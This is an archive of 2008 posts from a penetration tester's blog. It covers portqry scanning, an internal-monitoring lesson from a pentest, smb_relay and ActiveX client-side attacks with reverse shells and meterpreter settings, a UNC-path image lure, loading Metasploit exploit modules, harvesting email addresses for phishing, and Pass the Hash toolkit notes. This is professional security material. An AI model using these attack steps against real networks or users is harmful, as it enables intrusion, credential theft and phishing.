Thursday, July 31, 2008
Blackhat USA 2008 Fantasy League Picks
because I'm poor and my company is cheap i'm not making it to BH, but Wesley McGrew and I have decided to do our fantasy picks.
So here is the order I plan to pirate the BH videos in...
Day 1
10:00 - 11:00 Nmap: Scanning the Internet
11:15 - 12:30 Dan's talk will probably be too crowded so... Jinx: Malware 2.0
13:45 - 15:00 dunno....
15:15 - 16:30 Malware Analysis
16:45 - 18:00 Metapost exploitation **anything by val smith will be good
Day 2
10:00 - 11:00 Encoded, Layered and Transcoded Syntax Attacks: Threading the Needle Past Web Application Security
11:15 - 12:30 Circumventing Automated JavaScript Analysis Tools
13:45 15:00 Hacking and Injecting Federal Trojans
15:15 - 16:30 Most likely Jeremiah Grossman's talk or continue with Hacking and Injecting Federal Trojans
16:45 - 18:00 Pushing the Camel Through the Eye of a Needle or Methods for Understanding Targeted Attacks with Office Document
Tuesday, July 29, 2008
Its not nmap but it gets the job done -- portqry
C:\>portqry -n server1.company.com -e 3389
Querying target system called:
server1.company.com
Attempting to resolve name to IP address...
Name resolved to 10.1.1.1
querying...
TCP port 3389 (unknown service): LISTENING
Checking out the KB article on portqry will give you some of its more useful features.
Some fun options are its ability to send default ldap queries:
portqry -n myserver -p udp -e 389
UDP port 389 (unknown service): LISTENING or FILTERED
Sending LDAP query to UDP port 389...
LDAP query response:
currentdate: 12/13/2003 05:42:40 (unadjusted GMT)
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
dsServiceName: CN=NTDS Settings,CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
namingContexts: DC=domain,DC=example,DC=com
defaultNamingContext: DC=domain,DC=example,DC=com
schemaNamingContext: CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
configurationNamingContext: CN=Configuration,DC=domain,DC=example,DC=com
rootDomainNamingContext: DC=domain,DC=example,DC=com
supportedControl: 1.2.840.113556.1.4.319
supportedLDAPVersion: 3
supportedLDAPPolicies: MaxPoolThreads
highestCommittedUSN: 4259431
supportedSASLMechanisms: GSSAPI
dnsHostName: myserver.domain.example.com
ldapServiceName: domain.example.com:myserver$@domain.EXAMPLE.COM
serverName: CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
supportedCapabilities: 1.2.840.113556.1.4.800
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 0
forestFunctionality: 0
domainControllerFunctionality: 2
======== End of LDAP query response ========
UDP port 389 is LISTENING
and "sqlpings"
portqry -n 192.168.1.20 -e 1434 -p udp
You receive the following output:
Querying target system called:
192.168.1.20
querying...
UDP port 1434 (ms-sql-m service): LISTENING or FILTERED
Sending SQL Server query to UDP port 1434...
Server's response:
ServerName SQL-Server1
InstanceName MSSQLSERVER
IsClustered No
Version 8.00.194
tcp 1433
np \\SQL-Server1\pipe\sql\query
==== End of SQL Server query response ====
UDP port 1434 is LISTENING
It also does snmp queries and ISA queries and evidently RPC end-point mapping as well.
There are other fun features and the localhost options are worth looking into as well.
Some of the not so fun stuff. No randomizing ports. You can do an ordered list or ranges but no random. ONLY ONE HOST AT A TIME :-( but that's what batch files are for.
If anyone else is using this for pentests please let me know your thoughts.
Additional information on metacab: http://www.phx2600.org/forum/viewtopic.php?t=951&start=0
Monday, July 28, 2008
Passed My CISA
ph33r me!
I'll pass on the certification hating, see my posts on CEH != competent pentester and CISSP != competent pentester...pretty much the same feelings on this one.
*edit
looks like I had already done a CISA post...so i'll still spare you the hatin'
Sunday, July 27, 2008
The Importance Of Internal Monitoring
Second try. I had 2 class B's to look at so I took one of the shells from the snapshot viewer exploit and had it ping .0 of every class C in the network range. Whatever replied I took as a "good" subnet and if it didn't I marked it as not having anything listening and removed it from subsequent scans. Did I miss some boxes? Probably...didn't matter in this case.
Armed with my new ranges, minus off limit ones and dead ones, I started a new nmap scan looking for just a few ports that I had exploits for and let it roll at a blistering T2 pace. It did its thing and finished like 40 hours later and then I did my thing trying to do some manual enumeration and exploitation.
I upped the intensity as the week went on and never had any other trouble or any of my "worker bees" taken off line for misbehaving. So all was good.
At the outbrief it was determined that I found a fatal flaw with their system that there was no internal IDS monitoring for suspicious activity on the LAN. Had their been I probably would have been seen again but they had figured that anyone getting into the network would make the same mistake I had made the first time and scan or try to exploit non-used networks and they would catch them. I lucked out that 1) my ping sweep wasn't logged (should have been) or wasn't noticed after the fact and 2) I had more than one box on the LAN...I figured it was 50/50 that I would get seen with the ping sweep and worst case it would lead back to one of their boxes and not mine.
So what's the point? You need something watching your internal network even if its for the straight up blatant shit that could be happening. Had something been in place they would have definitely caught later port scans, enumeration, and exploit attempts.
Friday, July 25, 2008
Its the end of the world as we know it...and I feel fine
Every time there is a new vulnerability WITHOUT code everyone wants to debate and bitch about the "real impact" because there is no exploit code. But as soon as exploit code comes out all the bloggers and security people get to do the "Patch Now!" post. SO, if the vulnerability is indeed as serious as people say it is...You should all be kissing HD's and I)ruid's asses for throwing out the ammunition to get the serious vulnerability patched in hurry.
Is the average fresh CEH graduate script kiddie going to pwn the internet with this aux module? Hell no. After they get a domain poisoned, they still have to launch some sort of client side attack, deliver some malware that won't get flagged by AV, secure the box, and manage all the bots. Is that realistic for the average "script kiddie"? I don't think so.
Maybe a real bad guy can make that happen, but to think that "real bad guys" didn't already have this exploit after all the talk about it is just plain asinine.
I'm personally glad i have at least another quarter of job security, this kind of fear mongering is always great for job security and buying new toys.
**edit
Richard Bejtlich wrote up a similar but better response to the issue: http://taosecurity.blogspot.com/2008/07/dns-and-cyber-tardis-problem.html
**edit #2
Good writeup on the verizon security blog about the issue and possible scenarios.
http://securityblog.verizonbusiness.com/2008/07/25/dns-exploits-what-could-actually-happen/
Thursday, July 24, 2008
More On Leveraging Client-Side Exploits In Your Pentests--smb relay
I on the other hand always seem to have to work for it. In addition to my little snapshotviewer code (previous post) I threw in a smb_relay attack via metasploit. This was to see if I could get lucky and catch some users doing the wrong thing like browsing the net or clicking on links in emails with admin credentials and to leverage our foothold we had gained with weak physical security (I now had a box on the local network).
If you unfamiliar with the exploit itself, here's the info from the module:
Description:
This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia.
References:
http://en.wikipedia.org/wiki/SMBRelay
http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
http://www.xfocus.net/articles/200305/smbrelay.html
Simple enough to execute, start msf as root (needed to bind to 139), select payload, embed smb code into email or website, send email, cross fingers and wait.
The last post asked for code so here you go:
img src="\\networkIP\share\1.gif"
yep, that's some l33t shit right there...
For those of you that are more visual learners, I did a video last year for chicagocon as a demo here --smb_relay with reverse shell.
Issues, and there were some.
1. Most users wont have the permissions to actually create a service and run your payload, that's OK thats what the ActiveX attack was for.
2. Its messy, it leaves registry keys and executables on the box that "someone" will have to clean up.
3. My initial payload was a download and execute, which was supposed to grab the same .exe I was serving up for the ActiveX bug, for whatever reason that wasn't working (don't know why yet) so after a few failed attempts I switched to meterpreter payload. That led to issue 4.
4. With the way the exploit works it creates and calls a service, evidently there are issues with this because the service wont correctly respond to Windows (like status, start, stop) so Windows kills it after a period of time. Around 60 seconds for me. That's a bummer. More info here
The Fix: Thankfully there is a fix, but I found out about it after the fact. Once you select meterpreter as your payload you get a AutoRunScript option.
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > show advanced
Module advanced options:
Payload advanced options (windows/meterpreter/reverse_tcp):
Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension
Name : AutoRunScript
Current Setting:
Description : Script to autorun on meterpreter session creation
migrate.rb, located in your meterpreter scripts directory will migrate to lsass by default, this should solve the shell dying on you problem. I haven't tested it though, but someone I trust told me this should solve the problem.
The patch in the above Framework-Hackers post may work as well, I haven't tried that either.
5. After meterpreter not working I moved to the 'ol standby of reverse shells which were stable and stuck around until I did what I needed to do and killed the session.
I didn't get as lucky as g0ne. Turned out that several admins had added their domain user account to the local admin group on their workstation, so while it allowed the exploit to succeed I didn't get any shells with (domain) elevated privs. :-(
Its still a useful (internal) attack vector, add the smb_relay to now being able to most likely point any subdomain to an IP of your choosing with the new baliwicked metasploit auxiliary modules and you can probably pull off a pretty good hack if you have local network access. Gotta love exploitable "features."
Wednesday, July 23, 2008
Leveraging Client-Side Exploits In Your Pentests
This one is nice because its a auto download exploit. You call the ActiveX control and it downloads the file you specify to the location you specify. This is a great exploit from a user training perspective because you can make the binary as benign or dangerous as you want. I of course shoved a reverse shell out over FBP (firewall bypass protocol aka TCP 443).
Delivery is simple enough, you create an email with a link (see my metagoofil post if you need help gathering those emails) and ask politely for users with elevated permissions on the network to click on it. You embed snapshot viewer code in that page, point the download location to somewhere fun like all users/startup, and tail -f /apache/access.log to see who browses the site, who enables the activeX control (your users do know better right? or you do have your default IE settings to high right?) and who downloads your binary. If all goes well, after lunch you'll have your shell :-)
POC code from secfocus: http://downloads.securityfocus.com/vulnerabilities/exploits/30114.html
Sunday, July 20, 2008
Adding your own exploits and modules in Metasploit
In Linux (For the love of god, don't run msf on Windows) when you install metasploit you get a hidden .msf(/home/$user/.msf) directory in your home directory.
It starts out empty, but this is where you want to place all updated exploit modules, auxiliary modules, meterpreter scripts, etc.
Why? Well if you start modifying exploits in the trunk when you do an update it will start bitching at you about it not being the same exploit and may possible overwrite your stuff and that's no fun.
Example time.
Say you want to add the "HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)" exploit located on milworm. Its already in the trunk, so if you want to follow along you'll have to rm it.
What you have to do is create the same directory structure in your .msf folder as you have in your regular msf folder. So, looking at the exploit on milworm we see the path is:
class Exploits::Windows::Misc::Doubletake
So we cd into our .msf folder and create our modules folder (If you are lost, look at your regular msf folder and make a similar directory structure). Once we do that we need to create an exploits folder, a windows folder, and misc folder. Then we'll stick our doubletake.rb file into that folder.
cg@segfault:~/.msf3$ mkdir modules
cg@segfault:~/.msf3$ cd modules/
cg@segfault:~/.msf3/modules$ mkdir exploits
cg@segfault:~/.msf3/modules$ cd exploits/
cg@segfault:~/.msf3/modules/exploits$ mkdir windows
cg@segfault:~/.msf3/modules/exploits$ cd windows/
cg@segfault:~/.msf3/modules/exploits/windows$ mkdir misc
cg@segfault:~/.msf3/modules/exploits/windows$ cd misc
cg@segfault:~/.msf3/modules/exploits/windows/misc$ ls -l
total 4
-rw-r--r-- 1 cg cg 2277 2008-07-20 12:22 doubletake.rb
You don't need to mirror the directory structure completely, just add what you are adding. If you had Linux exploits you would add a linux folder in the exploits folder, since we don't its not necessary.
If everything worked right when you start the console you'll see one more exploit and you'll now be able use that exploit in the framework.
Before:
=[ msf v3.2-release
+ -- --=[ 302 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux
After:
=[ msf v3.2-release
+ -- --=[ 303 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux
Now we can use the exploit.
msf > use exploit/windows/misc/doubletake
msf exploit(doubletake) > info
Name: doubletake Overflow
Version: 9
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
ri0t
Available targets:
Id Name
-- ----
0 doubletake 4.5.0
1 doubletake 4.4.2
2 doubletake 4.5.0.1819
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1100 yes The target port
Payload information:
Space: 500
Avoid: 1 characters
Description:
This Module Exploits a stack overflow in the authentication
mechanism of NSI Doubletake which is also rebranded as hp storage
works Vulnerability found by Titon of Bastard Labs.
msf exploit(doubletake) >
same thing goes for auxiliary modules, just make an auxiliary folder in the modules directory and populate it accordingly. Pretty much the same thing for meterpreter scripts except the scripts aren't in the modules directory they are in their own, so in this case we'd make our scripts/meterpreter directories in the main .msf directory.
Thursday, July 17, 2008
Lack of usable emails for your pentest got you down...metagoofil FTW!
So there I was, trying to gather emails for our pentest. The only problem is that we were doing an assessment of city.domain.com but all the emails are listed as @domain.com. Just for clarification, searching domain.com for email addresses wouldn't necessarily give me emails that were in scope, so I had to think of something.
First step was some google-fu of "site:city.domain.com + @domain.com" that brought in a few emails addresses in. Next step was metagoofil. Metagoofil is awesome because it will download ms office, open office, and pdf documents from the domain you specify. It will parse the metadata and give you a list of the usernames in the documents and the path to where the document was saved.
How it works (images from the Edge-Security site)
It downloads the documents to your local computer so you can view them for extra info gatherings. It also gives you a nice little html page with the results.
After that I took the possible usernames, put them in the proper naming convention for the domain, rocketed off my SE email and crossed my fingers.
The result? Metagoofil for the win! Overall I had about 160 possible email addresses, 20 actually made it to someone's inbox...sad face but not bad considering how I got the possibles.
5 of the 20 opened it :-)
2 were forwarded (meaning the user that opened it was not initially emailed), 1 was from google, and 2 of the 5 were from metagoofil :-)
Not bad if you ask me.
Tuesday, July 15, 2008
McCain Can't Use the Internet
http://blog.wired.com/27bstroke6/2008/07/mccain-says-hes.html
how the F is someone that cant even get online supposed to be able to make good decisions for our country about all the different numbers of issues that come up with regard to the internet, privacy, security, etc
Thursday, July 3, 2008
Maltego for Information Gathering Part I
http://www.ethicalhacker.net/content/view/202/24/
"According to their web site, "Paterva invents and sells unique data manipulation software. Paterva is headed by Roelof Temmingh who is leading a light and lethal team of talented software developers." On May 6 2008, they released a new version of a very kewl tool named Maltego.
"Maltego, is an open source intelligence and forensics application. It allows for the mining and gathering of information as well as the representation of this information in a meaningful way. Coupled with its graphing libraries, Maltego, allows you to identify key relationships between information and identify previously unknown relationships between them. It is a must-have tool in the forensics.security and intelligence fields!"
Chris Gates' talk at ChicagoCon 2008s entitled "New School Information Gathering" touched on many tools and techniques. One of the tools he introduced to the audience is Maltego v2. This first in a two part series expands on this new tool with a basic introduction to Maltego followed by step-by-step personal recon tutorials. Part II will focus on infrastructure enumeration with Maltego."
Wednesday, July 2, 2008
Why would you tell the world when you go on vacation?
No link this time but its a recent post.
DeepSec 2007 talks are on google video
http://video.google.com/videosearch?q=deepsec&sitesearch=#
24th CCC talks are also available:
http://events.ccc.de/congress/2007/Fahrplan/events.en.html
'I've Got Nothing to Hide' and Other Misunderstandings of Privacy Paper
From the abstract:
" In this short essay, written for a symposium in the San Diego Law Review, Professor Daniel Solove examines the nothing to hide argument. When asked about government surveillance and data mining, many people respond by declaring: "I've got nothing to hide." According to the nothing to hide argument, there is no threat to privacy unless the government uncovers unlawful activity, in which case a person has no legitimate justification to claim that it remain private. The nothing to hide argument and its variants are quite prevalent, and thus are worth addressing. In this essay, Solove critiques the nothing to hide argument and exposes its faulty underpinnings."
http://papers.ssrn.com/sol3/papers.cfm?abstract_id=998565#PaperDownload
Pass The Hash Toolkit v1.4 released
from the full disclosure announcement:
Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz
Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz
Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums
What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)
*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3
without requiring any update)
*New -t switch for whosthere/whosthere-alt: establishes interval used
by the -i switch (by default 2 seconds).
*New -a switch for whosthere/iam: specify addresses to use. Format:
ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR
(WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work
either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC
script included in the Pass-The-Hash toolkit, and use the addresses
found by the script with the -a switch.
This basically allows you to specify addresses at runtime to whosthere whithout
the need to recompile the tool.
*New -r switch for iam/iam-alt: Create a new logon session and run a
command with
the specified credentials (e.g.: -r cmd.exe)
*genhash now outputs hashes using the LM HASH:NT HASH format
*several bugfixes and stuff
---
between winexe, msf psexec, token stealing, and the pass the hash toolkit, you'll never have to crack another password ever again.